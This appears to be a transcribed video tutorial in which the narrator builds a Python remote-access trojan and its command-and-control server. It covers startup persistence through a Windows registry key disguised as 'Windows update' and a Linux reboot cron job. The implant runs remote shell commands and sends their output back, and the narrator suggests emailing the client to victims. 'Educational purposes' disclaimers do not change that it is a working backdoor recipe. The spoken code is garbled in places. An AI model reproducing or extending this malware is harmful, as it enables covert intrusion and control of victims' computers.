Alright, let me flip up my webcam. So this video, we're going to make some malware, only for educational purposes. Don't use this maliciously. Not that it'll probably get flagged by antivirus anyways, but don't use this maliciously, obviously. This is only for educational purposes. Only use this on your own networks, on your own computer. Well, don't even use it on your computer. Use it on a VM for the client side. Like, you don't want to use this on your computer, most likely. Alright. So, I'm going to start by making this Python script, obviously. Just call it malware client. Alright. Alright. So the first thing we're going to do is import socket for network communication. We're going to import subprocesses to execute system commands. I then imported OS for file and directory operations. Import time for delays between retries, and import sys for system-specific operations, persistence, stuff like that. Alright. C2 server equals, I'll just put 192.168.1.100. Right. Replace that with attacker server IP. Right. Same thing there. The port, just replace that with the port. Normally 4444 works, and then reconnect. Delay equals 5. So now we're going to make a function called persist. So this attempts to establish persistence on the victim machine. So on Windows, it adds a registry entry to run at startup, and then on Linux, it adds a cron job to execute on reboot. And then if it's successful, it returns true. If not, it returns false. So the way we're going to do this is we're going to, if stock platform starts with win, we're going to import win for Windows registry manipulation. Right. So key equals winreg dot h key underscore current underscore user. Right. After that, what we're going to do is key path. So key path equals Software Microsoft, Windows current version run. Yeah. That's what it is. Okay. Now what we're going to do is try to open the registry key with write access. So, I'm just going to key. We're going to do key dot write. It's key underscore write, actually. Then we're going to set a value to run this script on startup. So, winreg set value x. Just name it Windows update, comma 0, comma win, sc, sys.executable. We don't need this part. Then we're going to close the registry key and return true. Except exception is E, print failed set persistence, return false. If we are unable to do this. Now, if the platform is Linux, if elif starts with Linux, we're going to create a temporary cron job file. So cron job equals f at reboot Python 3. OS underscore file. Right. Now we're going to with open. I'm gonna open a file. Let's open tmp / dot update we're going to open it as write as f after write cron job. Now we want to install the cron job, so the way we're going to do that is os.system, yep, like that, tab /temp /dot update. Alright, then we're going to return true. Else, return false. So that would be, I don't know, if this OS is not supported or something. Alright. So now that we've made the persistence function, we're going to make a connection function to connect to the C2 server, which continuously attempts to connect to the C2 server. If the connection fails, it retries after the reconnect delay that we have, which is 5 seconds. It returns the socket object on success. Okay, all true. Try with socket. Okay, no, that's, I mean, that's one way to do it, but s equals socket. So we're just going to make our socket. s.connect C2 server, C2 port. Okay, I'm not going to persist. What we can do is return S, return S. Reconnect delay, persist. Right. Now we're done with that. Actually, let's add a continue here instead of persist. So we're going to continue. So now we're going to do def, execute, command, save. So this executes the system command and returns the output. So it uses subprocesses.check output to run shell commands. And then it returns command output or an error message if the execution fails. I'm looking at the script that I made, and I made this beforehand, and I'm just gonna talk through it as I remake the script and improve on anything that's improvable. So normally it wouldn't do this. I added that, but alright. So we're gonna do try. Okay, what is going on? Output equals subprocesses.check output command shell equals true stderr equals subprocesses.stder. Okay, that's how you do that. To run the shell commands, I'm going to return output.decode and UTF-8. Accept. Exception is E. Command execution failed STRE. Okay. Now for the main function. So this is going to attempt persistence, then it's going to connect to the C2 server, and then it receives and executes commands. So if persistence mechanism set up successfully, else failed to set up persistence mechanism. While true. Try s.connect to C2. This is going to connect to the C2 server, and then s.send fine connected. While true, so the command execution loop. While true, cmd equals s dot receive 1024 code UTF-8 dot strip. So that's receiving the command from C2. If command dot lower in exit quit disconnect s dot close. Disconnected from S2 server. Alright. Elif cmd dot start cd. So this is going to handle directory changes. Try this is changing directories right here. Alright. Accept. Exception as E. Else output equals execute command. S.send output.encode UTF-8. Okay, so this will execute other commands. So now I'm gonna go to try block. Accept exception is E. Print error in main loop. Don't sleep, reconnect, and continue. If main equals main. That will run the script. Right. So this is the client side. So this is what you would send to them in a email or some way for ethical purposes only. Do not use this that way. It is illegal. Right. So what I'm going to do now is make the server. So the server so this is the controller that the attacker has. Right. Oops. Not what I want to do. So I'm going to do that. G2 underscores server. Alright. So import socket again for network communication. Import threading. I don't think we need OS or time. If we do, I'll import that later. I don't think we're gonna need it. Let me check. Okay, it doesn't look like we need it. We're gonna handle client. I don't know what my dad's laughing at. I'm sure I can hear that. Client underscore socket handles commands from the client. So this will basically receive commands from the attacker and send them to the implant. And then it prints the command output. So we're going to try. And then we're going to do a while loop. Infinite loop. Command equals input. If not command, we're going to continue. So skip empty commands. So if I just hit enter, it's not going to crash the program. It knows what to do. Okay. So client underscore socket dot send cmd encode UTF-8. We're going to encode that as UTF-8. This is going to send the command to implant. If command dot lower in exit, quit, or disconnect, then we're just going to disconnect the client and break. Right. If actually, do we need that? No. Output equals client socket dot receive 4096 dot decode UTF-8. Okay, that receives the command output. We want to print the output. We want to accept exception as E, print error handling client, and then finally client underscore socket dot close. So that ensures the socket is closed. Alright. So now we're going to write the main function. So the main logic that we're going to use here is we're going to bind to a port and listen for connections, and then it spawns a new thread for each connected implant. Right, so host equals .0.0.0.0. Listen on all interfaces. Port. We're not going to use that. We're going to use that. All right. Server equals socket dot af inet socket dot sock stream. We're going to open a socket. Then we're going to do server dot bind host port to bind it to the host and port. Now we want it to listen, so we're going to do server dot listen 5. We're going to allow 5 pending connections, and then we're just going to print out listening on the host and port. Okay. So now that it's binded, we're going to spawn a new thread for each connected implant. So while true, client underscore socket equals server dot accept. Right. What that does is it accepts new connections. We're going to print accepted connection from address 0, address 1. And then we do this now. Client underscore handler equals and then client handler dot start, so we can start it. Alright. Then if equals main, we're going to run the main function. And that's the server. Please don't use this for any malicious purposes. You will get in trouble for it. And it's not a good idea. So please don't use this for any malicious purposes. What we're going to do is continue to educate you on cybersecurity, and we're going to keep making videos like this in the future. Thank you for watching. Leave any comments and any suggestions. Join the Discord. Just, let me know what y'all want to see, and I'll put that on the channel. Alright, thanks for watching. I'll see y'all later.